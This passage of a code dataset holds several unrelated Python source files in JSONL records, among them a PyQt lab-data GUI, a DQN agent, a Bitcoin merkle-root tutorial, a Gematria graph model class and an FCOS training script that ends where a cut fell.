self.mainLayout.addLayout(self.drawLayout)\n self.mainLayout.addSpacing(20)\n self.mainLayout.addLayout(self.functionLayout)\n \n self.setLayout(self.mainLayout)\n\n def reset(self):\n print(\"reset\")\n #self.canvas.axes.clear()\n # plt.draw()\n # self.canvas.__init__()\n self.canvas.reset()\n self.graph.reset()\n self.result.setText(\"\")\n #self.canvas.updateFigure()\n #self.canvas.__init__()\n\n def export(self):\n filename = QFileDialog.getSaveFileName(self, 'Save File', \"\", \".csv\")\n #print(filename)\n if (self.b1.isChecked() == True):\n try:\n with open(filename[0]+\".csv\", \"w\") as output:\n writer = csv.writer(output, lineterminator='\\n')\n writer.writerows(map(lambda x, y, z: [x, y, z], self.canvas.lambdas, self.canvas.Qs, self.canvas.couplings))\n except (FileNotFoundError):\n pass\n else:\n try:\n with open(filename[0]+\".csv\", \"w\") as output:\n writer = csv.writer(output, lineterminator='\\n')\n left_lambdas, right_lambdas = self.canvas.lambdas[::2], self.canvas.lambdas[1::2]\n left_Qs, right_Qs = self.canvas.Qs[::2], self.canvas.Qs[1::2]\n left_couplings, right_couplings = self.canvas.couplings[::2], self.canvas.couplings[1::2]\n writer.writerows(\"B\")\n writer.writerows(map(lambda x, y, z: [x, y, z], left_lambdas, left_Qs, left_couplings))\n writer.writerows(\"R\")\n writer.writerows(map(lambda x, y, z: [x, y, z], right_lambdas, right_Qs, right_couplings))\n except (FileNotFoundError):\n pass\n\n\n def openQ(self):\n global Qname\n Qname, _ = QFileDialog.getOpenFileName(self, \"Open lvm File\", \"\", \" *.lvm;;All Files (*)\")\n Qname = os.path.normpath(Qname)\n try:\n exp = Qname[:-5] + \"1.lvm\"\n self.graph.show()\n self.graph.plot(readlvm(exp))\n except (FileNotFoundError):\n pass\n\n def process(self):\n if (self.b1.isChecked() == True):\n Qs, couplings, lambdas = baseQ(Qname, self.slambda.text(), self.slope.text(), self.comboBox.currentText(), 1)\n self.canvas.setParameter(Qs, couplings, lambdas)\n self.canvas.plot(1)\n self.canvas.updateFigure()\n else:\n fit_range = self.graph.calcRange()\n rg = 0\n if fit_range < 250:\n rg = 1500\n elif fit_range < 500:\n rg = 3000\n elif fit_range < 1000:\n rg = 5000\n else:\n rg = 6000\n Qs, couplings, lambdas = baseQ(Qname, self.slambda.text(), self.slope.text(), self.comboBox.currentText(), 2, rg)\n self.canvas.setParameter(Qs, couplings, lambdas)\n self.canvas.plot(2)\n self.canvas.updateFigure()\n # import numpy as np\n # x = np.asarray(couplings[:-1], dtype='float')\n # Y = np.asarray(Qs[:-1], dtype='float')\n # A = np.vstack([x, np.ones(len(x))]).T\n # m, c = np.linalg.lstsq(A, Y, rcond=None)[0]\n # self.canvas.create_draggable_points(x.min(), m*x.min()+c, x.max(), m*x.max()+c, 0.1, 1000000)\n\n def fit(self):\n self.canvas.Rsquared()\n\n def unfit(self):\n self.canvas.unfit()\n\n # def export(self):\n # self.canvas.export()\n\n def updateQ(self, intercept, std_err):\n self.result.setText(str('{:.3e}'.format(intercept))+\"±\"+str('{:.3e}'.format(std_err)))\n\n\n def alert(self, num):\n if (num == 1): QMessageBox.about(self, \"Error\", \"No point selected\")\n if (num == 2): QMessageBox.about(self, \"Error\", \"You should fit first\")\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n main = MainWindow()\n main.show()\n sys.exit(app.exec_())","repo_name":"yixuanzhou/Lab-Data-Analysis-Tools","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29172392273","text":"# -*- coding: utf-8 -*-\nfrom collections import deque\nimport random\nimport numpy as np\nfrom dqn import DQN\nimport torch\n\nrandom.seed(42)\n\n# paramètres\nN = 10000 # nb de pas pour mettre à jour les poids par copie\n# N = 1000 # nb de pas pour mettre à jour les poids par copie\n\nclass Agent:\n\n def __init__(self, memory_size, batch_exp_size, input_size, output_size, method_update_weights):\n self.memory = deque(maxlen=memory_size)\n self.batch_exp_size = batch_exp_size\n # réseaux de neurones\n self.policy_network = DQN(\n input_size=input_size, \n output_size=output_size\n )\n self.target_network = DQN(\n input_size=input_size, \n output_size=output_size\n )\n\n self.method_update_weights = method_update_weights\n self.pas = 0\n\n '''\n Mémorise une interaction au buffer circulaire\n '''\n def memorise_interaction(self, interaction):\n self.memory.append(interaction)\n\n '''\n Vérifie si on a assez d'interactions pour faire apprendre le NN\n '''\n def enough_interactions(self):\n return len(self.memory) >= self.batch_exp_size\n\n '''\n Retourne un ensemble d'interactions\n '''\n def get_batch_exp(self):\n if len(self.memory) == self.batch_exp_size: # pas assez d'expériences\n return np.array(self.memory, dtype = object)[0:len(self.memory)]\n else:\n random_number = random.randrange(len(self.memory) - self.batch_exp_size)\n return np.array(self.memory, dtype = object)[random_number:random_number + self.batch_exp_size]\n\n '''\n Fait apprendre le réseau de neurones\n '''\n def learn_nn(self):\n batch_exp = self.get_batch_exp()\n q_next_states_target = self.target_network.forward(torch.tensor(batch_exp[:, 2].tolist()))\n self.policy_network.learn(batch_exp=batch_exp, q_next_states=q_next_states_target)\n\n '''\n Applique une mise à jour des poids de Q' par Q\n '''\n def update_weights(self):\n self.pas += 1\n # print(self.pas)\n if self.method_update_weights == 'copy' and self.pas == N:\n self.pas = 0\n weights = self.policy_network.get_weights()\n # print(\"WEIGHTALORS\", weights)\n self.target_network.update_weights_copy(weights)\n elif self.method_update_weights == 'scale':\n weights = self.policy_network.get_weights()\n self.target_network.update_weights_scale(weights)\n\n '''\n Récupère la meilleure action\n '''\n def best_action(self, state, method):\n if method == 'greedy':\n return self.policy_network.greedy_forward(state=state)\n else:\n return self.policy_network.basic_forward(state=state)\n\n '''\n Sauvegarde les configurations des nn dans un fichier\n '''\n def save_perfs(self, filename):\n torch.save({\n 'policy_network': self.policy_network.state_dict(),\n 'target_network': self.target_network.state_dict(),\n }, filename)\n\n '''\n Charge les configurations des nn dans un fichier\n '''\n def load_perfs(self, filename):\n checkpoint = torch.load(filename)\n self.policy_network.load_state_dict(checkpoint['policy_network'])\n self.target_network.load_state_dict(checkpoint['target_network'])\n ","repo_name":"ruyters/ruyters.github.io","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30647851893","text":"#파이썬의 list타입에만 축약\nwordList=[\"school\", \"book\", \"bookstore\", \"desk\", \"hospital\", \"survey\",\n \"assembly\", \"president\", \"python\", \"flower\", \"sky\", \"cloud\",\n \"language\", \"phone\", \"house\"]\n\nnums = [1,2,3,4,5,6,7,8,9,10,17,19,21]\n\n#list타입에서 데이터 추출하기 위한 용도\n#[변수명 for 변수명 리스트타입 ]\n#[변수명 for 변수명 리스트타입 if 조건식] 조건식이 True인것만 추출\n#[함수(변수명) for 변수명 리스트타입 if 조건식] 조건식이 True인것중에 값을 변경해서 추출\n\n#소프트카피(얕은카피)와 하드카피(깊은카피)\n#파이썬의 모든 변수는 데이터 자체가 아니라 데이터의 주소를 저장한다\n#만일 nums라는 변수가 있을때 nums2 = nums 라고 하면 이때 nums2에는 nums에 저장된\n#주소값이 복사되어서 실제 데이터는 하나이고 두개의 변수가 같은 데이터를 소유하게 된다.\n#이를 얕은 카피라고 하고 모든 참조형 또는 포인터형 변수의 기본 특징이다\n# nums2 = nums #이때 두 변수는 같은 데이터 공간을 소유하게 된다.\n# nums2[0]=100\n# print( nums2 )\n# print( nums )\n\nnums2 = [x for x in nums] #하드카피상황\nnums2[0]=100\n\nprint( nums )\nprint( nums2 )\n\nevenList = [ n for n in nums if n%2==0]\nprint( evenList )\n\n#3의 배수만 추출하기\nevenList = [ nn for nn in nums if nn%3==0]\nprint( evenList )\n\n#wordList에서 문자열 크기가 5글자 넘어가는것만 추출하기\nwList = [nn for nn in wordList if len(nn)>5]\nprint( wList )\n\n#wordList에서 문자열 크기가 5글자 넘어가는것만 추출해서 대문자로\nwList = [nn.upper() for nn in wordList if len(nn)>5]\nprint( wList )\n\ndataList = [\n {\"name\":\"강감찬\", \"age\":23},\n {\"name\":\"감강찬\", \"age\":20},\n {\"name\":\"김연경\", \"age\":33},\n {\"name\":\"조승연\", \"age\":28},\n {\"name\":\"김연아\", \"age\":30},\n {\"name\":\"이순신\", \"age\":43},\n {\"name\":\"서휘\", \"age\":35},\n {\"name\":\"윤관\", \"age\":27},\n {\"name\":\"박세리\", \"age\":43}\n]\n\n#나이가 30세 넘어가는 사람\nresultList = []\nprint (resultList )\n\ndList = [data for data in dataList if data[\"age\"]>=30]\nprint( dList )\nprint( len(dList) )\n\n#외부에서 라이브러리를 들고 들어온다. 새로운 이름을 부여\nimport numpy as np\nx = [1,2,3,4,5] #list타입\nx = np.array(x) #ndarray 타입으로 전환\ny = 2*x + 1 #백터연산 , R언어\nprint( y )\n\n\n\n","repo_name":"kei-92xx/PD_day5","sub_path":"컴프리헨션.py","file_name":"컴프리헨션.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32683861843","text":"#!/usr/bin/env python\nimport sys\nimport fileinput\n\ndef main(argv):\n state = 0\n for line in fileinput.input():\n line = line.strip()\n if not line or line.startswith('#'):\n if state == 1:\n state = 2\n print('}\\n')\n print(line)\n continue\n if state == 0:\n print('\\nglyphname2unicode = {')\n state = 1\n (name,x) = line.split(';')\n codes = x.split(' ')\n print(' %r: u\\'%s\\',' % (name, ''.join( '\\\\u%s' % code for code in codes )))\n\nif __name__ == '__main__': sys.exit(main(sys.argv))\n","repo_name":"euske/pdfminer","sub_path":"tools/conv_glyphlist.py","file_name":"conv_glyphlist.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":5112,"dataset":"github-code","pt":"53"} +{"seq_id":"6354278974","text":"from datetime import date, timedelta\nfrom calendar import monthrange\n\nclass MeetupDayException(BaseException):\n '''Raise when my specific value is wrong'''\n\ndef meetup_day(year, month, day, week):\n\tmonth_start = date(year, month, 1)\n\tfirst_day_with_name = _get_first_day_with_name(month_start, day)\n\tif week == 'teenth':\n\t\tweek_start = date(year, month, 13)\n\t\treturn _get_first_day_with_name(week_start, day)\n\telif week == 'last':\n\t\treturn _get_last_day_with_name(year, month, day)\n\telse:\n\t\tnew_date = first_day_with_name + timedelta(days=delta_map[week])\n\t\tif new_date.month == month:\n\t\t\treturn new_date\n\t\telse:\n\t\t\traise MeetupDayException\n\ndef _get_first_day_with_name(start, day):\n\tday_number = day_map[day]\n\tstart_day_number = start.weekday()\n\toffset = (day_number - start_day_number + 7) % 7\n\treturn start + timedelta(days=offset)\n\n\ndef _get_last_day_with_name(year, month, day):\n\tstart_day, length = monthrange(year, month)\n\tlast_day = date(year, month, length)\n\tlast_day_number = last_day.weekday()\n\tday_number = day_map[day]\n\toffset = (last_day_number - day_number + 7) % 7\n\treturn last_day - timedelta(days=offset)\n\ndelta_map = {\n\t'1st': 0,\n\t'2nd': 7,\n\t'3rd': 14,\n\t'4th': 21,\n\t'5th': 28\n}\n\nday_map = {\n\t'Monday': 0,\n\t'Tuesday': 1,\n\t'Wednesday': 2,\n\t'Thursday': 3,\n\t'Friday': 4,\n\t'Saturday': 5,\n\t'Sunday': 6\n}","repo_name":"Pappa/exercism","sub_path":"python/meetup/meetup.py","file_name":"meetup.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23823477866","text":"## Objective: hash A|B, C|D and then the interior nodes to get the\n## merkle root \n\n## Bitcoin relies on the SHA256 hash function\nfrom hashlib import sha256\nfrom codecs import decode\nfrom binascii import hexlify\n\n## Bitcoin uses the SHA256d hash function, which is the SHA256 function\n## run twice (double).\ndef sha256d(data):\n return sha256(sha256(data).digest()).digest()\n\n## We'll get our data from Bitcoin Core, which displays hashes in RPC\n## Byte Order. This converts hex to binary in Internal Byte Order.\ndef rpc2internal(hash):\n return decode(hash, 'hex')[::-1]\n\n## We'll also want to display our results as hex in RPC Byte Order, so\n## we need to convert back.\ndef internal2rpc(hash):\n return hexlify(hash[::-1])\n\n\n\n## build_tree takes a list of nodes in IBO and returns a merkle root in IBO\n## Take an array with an factor-of-2 number of merkle nodes and hash\n## each pair together. This is a recursive function where each level\n## higher on the call stack is a level closer to the merkle root\ndef build_tree(list_of_nodes):\n ## if the list of nodes has only one has, it's the merkle root\n print(\"\\n\"+\"Printing list of nodes\")\n print (list_of_nodes)\n if len(list_of_nodes)==1:\n return list_of_nodes[0]\n\n ## Hash each pair together into a new list nodes one level closer\n ## the the merkle root\n new_nodes = []\n for i in range (0, len(list_of_nodes)-1,2):\n new_nodes.append(sha256d(list_of_nodes[i] + list_of_nodes[i+1]))\n\n ## Recursively build the next level closer to the merkle root\n return (build_tree(new_nodes))\n\n\n \n\n\n\n## Take an array with two txids and hash them together to produce a\n## merkle root.\ndef find_merkle_root(txids):\n ## Start by converting all hashes to Internal Byte Order, using them\n ## as the merkle leaf nodes\n leaf_nodes = []\n for i in range(0, len(txids)):\n leaf_nodes.append(rpc2internal(txids[i]))\n \n ## Use build_tree() to find the merkle root and convert the result\n ## to RPC byte order.\n return internal2rpc(build_tree(leaf_nodes))\n\n## These are the txids from block 546. The correct merkle root is\n## e10a7f8442ea6cc6803a2b83713765c0b1199924110205f601f90fef125e7dfe\nblock_txids = [\n \"e980fe9f792d014e73b95203dc1335c5f9ce19ac537a419e6df5b47aecb93b70\",\n \"28204cad1d7fc1d199e8ef4fa22f182de6258a3eaafe1bbe56ebdcacd3069a5f\",\n \"6b0f8a73a56c04b519f1883e8aafda643ba61a30bd1439969df21bea5f4e27e2\",\n \"3c1d7e82342158e4109df2e0b6348b6e84e403d8b4046d7007663ace63cddb23\",\n]\n\nprint(find_merkle_root(block_txids))\n","repo_name":"myprak/21tutor","sub_path":"tut02/merkle-frame2.py","file_name":"merkle-frame2.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26402523436","text":"from collections.abc import Sequence\nfrom typing import Any\n\nfrom gematria.basic_block.python import basic_block\nfrom gematria.granite.python import gnn_model_base\nfrom gematria.granite.python import graph_builder\nfrom gematria.model.python import model_base\nfrom gematria.model.python import oov_token_behavior\nfrom gematria.model.python import token_model\nimport graph_nets\nimport numpy as np\nimport tensorflow.compat.v1 as tf\n\n_OutOfVocabularyTokenBehavior = oov_token_behavior.OutOfVocabularyTokenBehavior\n\n\nclass GraphBuilderModelBase(\n token_model.TokenModel, gnn_model_base.GnnModelBase\n):\n \"\"\"Base class for models usign the BasicBlockGraphBuilder graphs.\n\n The model integrates the basic block to graph transformation into the Gematria\n framework and provides functionality for extracting per-instruction data out\n of the output graph. The construction of the graph network modules and the\n readout network must be done in child classes.\n \"\"\"\n\n # The name of GraphBuilderModelBase.special_tokens_tensor in the TensorFlow\n # graph.\n SPECIAL_TOKENS_TENSOR_NAME = 'GraphBuilderModelBase.special_tokens'\n\n # The name of the input tensor that receives the instruction node mask.\n INSTRUCTION_NODE_MASK_TENSOR_NAME = (\n 'GraphBuilderModelBase.instruction_node_mask'\n )\n\n # A Boolean tensor placeholder that receives a mask for instruction nodes. The\n # mask has shape (None,), and it must have the same length as\n # self._graphs_tuple_placeholders.nodes along the first dimension. It contains\n # True at position i if and only if self._graphs_tuple_placeholders.nodes[i]\n # is an instruction node (node_type == NodeType.INSTRUCTION). The mask is used\n # to collect the feature vectors of nodes corresponding to instructions for\n # further processing during readout.\n _instruction_node_mask: tf.Tensor\n\n # A tensor that contains feature vectors of nodes representing instructions in\n # the order in which they are in the basic block, i.e. in the same order\n # instructions appear in ModelBase._output_tensor_deltas.\n _instruction_features: tf.Tensor\n\n # The graph builder used to compose the GraphsTuple data structure passed to\n # the TensorFlow computation.\n _batch_graph_builder: graph_builder.BasicBlockGraphBuilder\n\n # A 1D int tensor that contains indices of special tokens used by the graph\n # builder. See the docstring of self.special_tokens_tensor for more details on\n # the format of the data.\n _special_tokens_tensor: tf.Tensor\n\n def __init__(\n self,\n *,\n tokens: Sequence[str],\n immediate_token: str,\n fp_immediate_token: str,\n address_token: str,\n memory_token: str,\n **kwargs: Any,\n ) -> None:\n \"\"\"Initializes the model with the given feature factory.\n\n Args:\n tokens: The list of tokens that may be associated with the nodes of the\n basic block graph (e.g. instruction mnemonics and register names used in\n the canonicalized basic block protos processed by the model). This list\n is passed to the basic block builder which translates the token for each\n node into its index in this list, and the index is then used as the\n feature of the node.\n immediate_token: The token that is associated with immediate value nodes\n in the basic block graph.\n fp_immediate_token: The token that is associated with floating-point\n immediate values in the basic block graph.\n address_token: The token that is associated with address computation nodes\n in the basic block graph.\n memory_token: The token that is associated with memory value nodes in the\n basic block graph.\n **kwargs: Additional keyword arguments are passed to the constructor of\n the base class.\n \"\"\"\n # NOTE(ondrasej): We set the node/edge feature dtypes to int32. They are\n # indices to the token list/edge type; an int32 should be sufficient for all\n # our use cases and fixing the type will make it easier to move the array\n # construction to the C++ code if needed in the future. Similarly for the\n # graph index dtype.\n super().__init__(\n node_feature_shape=(),\n node_feature_dtype=tf.dtypes.int32,\n edge_feature_shape=(),\n edge_feature_dtype=tf.dtypes.int32,\n global_feature_shape=(len(tokens),),\n global_feature_dtype=tf.dtypes.int32,\n graph_index_dtype=tf.dtypes.int32,\n tokens=tokens,\n **kwargs,\n )\n self._instruction_node_mask = None\n self._instruction_features = None\n self._batch_graph_builder = graph_builder.BasicBlockGraphBuilder(\n node_tokens=self._token_list,\n immediate_token=immediate_token,\n fp_immediate_token=fp_immediate_token,\n address_token=address_token,\n memory_token=memory_token,\n out_of_vocabulary_behavior=self._oov_behavior,\n )\n\n self._special_tokens_tensor = None\n\n @property\n def special_tokens_tensor(self) -> tf.Tensor:\n \"\"\"Returns the indices of special node tokens.\n\n The returned tensor contains indices of the special tokens in the list\n encoded in self.token_list_tensor. The indices of the special tokens are\n stored in the following order:\n 1. immediate value node token,\n 2. floating-point immediate value node token,\n 3. address computation node token,\n 4. memory value node token,\n 5. replacement token used to replace immediate values. This index is set\n to -1 when the model is not trained with replacement tokens.\n \"\"\"\n return self._special_tokens_tensor\n\n # @Override\n @property\n def output_tensor_names(self) -> Sequence[str]:\n return (\n *super().output_tensor_names,\n GraphBuilderModelBase.SPECIAL_TOKENS_TENSOR_NAME,\n )\n\n # @Override\n def _create_tf_graph(self) -> None:\n \"\"\"See base class.\"\"\"\n super()._create_tf_graph()\n special_tokens = np.array(\n (\n self._batch_graph_builder.immediate_token,\n self._batch_graph_builder.fp_immediate_token,\n self._batch_graph_builder.address_token,\n self._batch_graph_builder.memory_token,\n self._batch_graph_builder.replacement_token,\n ),\n dtype=np.int32,\n )\n self._special_tokens_tensor = tf.constant(\n special_tokens,\n dtype=tf.dtypes.int32,\n name=GraphBuilderModelBase.SPECIAL_TOKENS_TENSOR_NAME,\n )\n\n # @Override\n def _create_readout_network_resources(self) -> None:\n super()._create_readout_network_resources()\n self._instruction_node_mask = tf.placeholder(\n dtype=tf.dtypes.bool,\n shape=(None,),\n name=GraphBuilderModelBase.INSTRUCTION_NODE_MASK_TENSOR_NAME,\n )\n self._instruction_features = tf.boolean_mask(\n self._graphs_tuple_outputs.nodes, self._instruction_node_mask\n )\n\n # @Override\n def _start_batch(self) -> None:\n super()._start_batch()\n self._batch_graph_builder.reset()\n\n # @Override\n def _make_batch_feed_dict(self) -> model_base.FeedDict:\n feed_dict = super()._make_batch_feed_dict()\n feed_dict[self._instruction_node_mask] = np.array(\n self._batch_graph_builder.instruction_node_mask, dtype=bool\n )\n return feed_dict\n\n # @Override\n def _make_batch_graphs_tuple(self):\n node_features = np.array(\n self._batch_graph_builder.node_features,\n dtype=self._graph_node_feature_spec.dtype.as_numpy_dtype,\n )\n if self._oov_injection_probability > 0:\n # Each token is replaced with the probability\n # self._oov_injection_probability.\n # TODO(ondrasej): Consider initializing the random number generator using\n # some property of the batch, to ensure that the replacements for each\n # batch are stable.\n injection_mask = (\n np.random.default_rng().random(node_features.shape)\n < self._oov_injection_probability\n )\n node_features[injection_mask] = self._oov_token\n return graph_nets.graphs.GraphsTuple(\n nodes=node_features,\n edges=np.array(\n self._batch_graph_builder.edge_features,\n dtype=self._graph_edge_feature_spec.dtype.as_numpy_dtype,\n ),\n # NOTE(ondrasej): The graph globals are not normalized by the number of\n # nodes in the graph. We could do it here, but we can also do it by\n # introducing a LayerNorm layer in the first graph network module.\n globals=np.array(\n self._batch_graph_builder.global_features,\n dtype=self._graph_global_feature_spec.dtype.as_numpy_dtype,\n ),\n receivers=np.array(\n self._batch_graph_builder.edge_receivers,\n dtype=self._graph_index_dtype.as_numpy_dtype,\n ),\n senders=np.array(\n self._batch_graph_builder.edge_senders,\n dtype=self._graph_index_dtype.as_numpy_dtype,\n ),\n n_node=np.array(\n self._batch_graph_builder.num_nodes_per_block,\n dtype=self._graph_index_dtype.as_numpy_dtype,\n ),\n n_edge=np.array(\n self._batch_graph_builder.num_edges_per_block,\n dtype=self._graph_index_dtype.as_numpy_dtype,\n ),\n )\n\n # @Override\n def _add_basic_block_to_batch(self, block: basic_block.BasicBlock) -> None:\n basic_block_was_added = self._batch_graph_builder.add_basic_block(block)\n if not basic_block_was_added:\n # TODO(ondrasej): Better handling of blocks that can't be added to the\n # batch. For now, we just let the exception propagate out of the model and\n # let the user handle it.\n raise model_base.AddBasicBlockError(\n f'Basic block could not be added to the batch: {block}'\n )\n","repo_name":"google/gematria","sub_path":"gematria/granite/python/graph_builder_model_base.py","file_name":"graph_builder_model_base.py","file_ext":"py","file_size_in_byte":9658,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"27677505538","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 12 18:15:08 2020\n\n@author: sks\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport _init_paths\nimport os\nimport sys\nimport numpy as np\nimport argparse\nimport pprint\nimport pdb\nimport time\nimport logging\n\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nfrom torch.utils.data.sampler import Sampler\n\n\nfrom databuild.roidb import combined_roidb\nfrom databuild.roibatchLoader import roibatchLoader, sampler\nfrom cfgs.config import cfg, cfg_from_file, cfg_from_list, get_output_dir\nfrom functional.net_utils import weights_normal_init, save_net, load_net, adjust_learning_rate, save_checkpoint, clip_gradient\nfrom nets.FCOS import FCOS\nfrom exec.optimizer import make_lr_scheduler, make_optimizer\n\ndef parse_args():\n \"\"\"\n Parse input arguments\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Train the FCOS network\")\n parser.add_argument('--dataset', dest='dataset',\n help='training dataset',\n default='pascal_voc', type=str)\n parser.add_argument('--net', dest='net',\n help='res101, res152, etc',\n default='res101', type=str)\n parser.add_argument('--start_epoch', dest='start_epoch',\n help='starting epoch',\n default=1, type=int)\n parser.add_argument('--max_epochs', dest='max_epochs',\n help='number of epochs to train',\n default=24, type=int)\n parser.add_argument('--disp_interval', dest='disp_interval',\n help='number of iterations to display',\n default=10, type=int)\n parser.add_argument('--checkpoint_interval', dest='checkpoint_interval',\n help='number of iterations to display',\n default=10000, type=int)\n\n parser.add_argument('--save_dir', dest='save_dir',\n help='directory to save models',\n default='output', type=str)\n parser.add_argument('--num_workers', dest='num_workers',\n help='number of worker to load data',\n default=1, type=int)\n parser.add_argument('--cuda', dest='cuda',\n help='whether use CUDA',\n default=True, action='store_true')\n parser.add_argument('--mGPUs', dest='mGPUs',\n help='whether use multiple GPUs',\n default=True, action='store_true')\n parser.add_argument('--lscale', dest='lscale',\n help='whether use large scale',\n default=True, action='store_true')\n\n parser.add_argument('--s', dest='session',\n help='training session',\n default=1, type=int)\n parser.add_argument('--r', dest='resume',\n help='resume checkpoint or not',\n default=False, type=bool)\n parser.add_argument('--checksession', dest='checksession',\n help='chechsession to load model',\n default=1, type=int)\n parser.add_argument('--checkepoch', dest='checkepoch',\n help='checkepoch to load model',\n default=1, type=int)\n parser.add_argument('--checkpoint', dest='checkpoint',\n help='checkpoint to load model',\n default=0, type=int)\n\n parser.add_argument('--use_tfboard', dest='use_tfboard',\n help='whether use tensorflow tensorboard',\n default=True, type=bool)\n\n args = parser.parse_args()\n return args\n\ndef is_pytorch_1_1_0_or_later():\n return [int(_) for _ in torch.__version__.split(\".\")[:3]] >= [1, 1, 0]\n\nif __name__ == '__main__':\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0, 1, 2, 3\"\n args = parse_args()\n print('Called with args:')\n print(args)\n\n if args.dataset == 'pascal_voc':\n args.imdb_name = 'voc_2007_trainval'\n args.imdbval_name = 'voc_2007_test'\n args.set_cfgs = ['MAX_NUM_GT_BOXES', '20']\n elif args.dataset == 'pascal_voc_0712':\n args.imdb_name = 'voc_2007_trainval + voc_2012_trainval'\n args.imdbval_name = 'voc_2007_test'\n args.set_cfgs = ['MAX_NUM_GT_BOXES', '20']\n elif args.dataset == 'coco':\n args.imdb_name = 'coco_2014_train + coco_2014_valminusminival'\n args.imdbval_name = 'coco_2014_minival'\n args.set_cfgs = ['MAX_NUM_GT_BOXES', '20']\n\n if args.cfg_file is not None:\n cfg_from_file(args.cfg_file)\n if args.set_cfgs is not None:\n cfg_from_list(args.set_cfgs)\n print('Using config:')\n pprint.pprint(cfg)\n\n np.random.seed(cfg.RNG_SEED)\n\n if torch.cuda.is_available() and not args.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\n cfg.TRAIN.USE_FLIPPED = True\n cfg.USE_GPU_NMS = args.cuda\n imdb, roidb, ratio_list, ratio_index = combined_roidb(args.imdb_name)\n train_size = len(roidb)\n print('{:d} roidb entries'.format(len(roidb)))\n\n output_dir = args.save_dir + \"/\" + args.net + \"/\" + args.dataset\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n sampler_batch = sampler(train_size, args.batch_size)\n dataset = roibatchLoader(roidb, ratio_list, ratio_index, args.batch_size, imdb.num_classes, training=True)\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size, sampler=sampler_batch,\n num_workers=args.num_workers)\n\n im_data = torch.FloatTensor(1)\n im_info = torch.FloatTensor(1)\n num_boxes = torch.LongTensor(1)\n gt_boxes = torch.FloatTensor(1)\n\n if args.cuda:\n im_data = im_data.cuda()\n im_info = im_info.cuda()\n num_boxes = num_boxes.cuda()\n gt_boxes = gt_boxes.cuda()\n\n im_data = Variable(im_data)\n im_info = Variable(im_info)\n num_boxes = Variable(num_boxes)\n gt_boxes = Variable(gt_boxes)\n\n if args.cuda:\n cfg.CUDA = True\n\n det_net = FCOS(imdb.classes)\n optimizer = make_optimizer(det_net)\n scheduler = make_lr_scheduler(optimizer)\n pytorch_1_1_0_or_later = is_pytorch_1_1_0_or_later()\n\n if args.resume:\n load_name = os.path.join(output_dir, 'fcos_{}_{}_{}.pth'.format(args.checksession, args.checkepoch, args.checkpoint))\n print(\"loading checkpoint %s\" % (load_name))\n checkpoint = torch.load(load_name)\n args.session = checkpoint['session']\n args.start_epoch = checkpoint['epoch']\n det_net.load_state_dict(checkpoint['model'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n lr = optimizer.param_groups[0]['lr']\n if 'pooling_mode' in checkpoint.keys():\n cfg.POOLING_MODE = checkpoint['pooling_mode']\n print(\"loaded checkpoint %s\" % (load_name))\n\n if args.mGPUs:\n det_net = nn.DataParallel(det_net)\n\n if args.cuda:\n det_net = det_net.cuda()\n\n iters_per_epoch = int(train_size / cfg.SOLVER.IMS_PER_BATCH)\n for epoch in range(args.start_epoch, args.max_epochs):\n det_net.train()\n loss_temp = 0\n start = time.time()\n\n if not pytorch_1_1_0_or_later:\n scheduler.step()\n\n data_iter = iter(dataloader)\n for step in range(iters_per_epoch):\n data = data_iter.next()\n with torch.no_grad():\n im_data.resize_(data[0].size()).copy_(data[0])\n im_info.resize_(data[1].size()).copy_(data[1])\n gt_boxes.resize_(data[2].size()).copy_(data[2])\n num_boxes.resize_(data[3].size()).copy_(data[3])\n det_net.zero_grad()\n\n loss_box_cls, loss_box_reg, loss_centerness = det_net(im_data, im_info, gt_boxes)\n\n loss = loss_box_cls.mean() + loss_box_reg.mean() + loss_centerness.mean()\n loss_temp += loss.item()\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if step % args.disp_interval == 0:\n end = time.time()\n if step > 0:\n loss_temp /= args.disp_interval\n\n if args.mGPUs:\n loss_box_cls = loss_box_cls.mean().item()\n loss_box_reg = loss_box_reg.mean().item()\n loss_centerness = loss_centerness.mean().item()\n else:\n loss_box_cls = loss_box_cls.item()\n loss_box_reg = loss_box_reg.item()\n loss_centerness = loss_centerness.item()\n print(\"[session %d][epoch %2d][iter %4d] loss: %.4f, lr: %.2e\" \\\n % (args.session, epoch, step, loss_temp, lr))\n print(\"\\t\\t\\t loss_box_cls: %.4f, loss_box_reg: %.4f, loss_centerness: %.4f\" \\\n % (loss_box_cls, loss_box_reg, loss_centerness))\n\n if args.use_tfboard:\n info = {\n 'loss': loss_temp,\n 'loss_box_cls': loss_box_cls,\n 'loss_box_reg': loss_box_reg,\n 'loss_centerness': loss_centerness,\n }\n\n loss_temp = 0\n start = time.time()\n\n if pytorch_1_1_0_or_later:\n scheduler.step()\n\n if args.mGPUs:\n save_name = os.path.join(output_dir, 'fcos_{}_{}_{}.pth'.format(args.session, epoch, step))\n save_checkpoint({\n 'session': args.session,\n 'epoch': epoch + 1,\n 'model': det_net.module.state_dict(),\n 'optimizer': 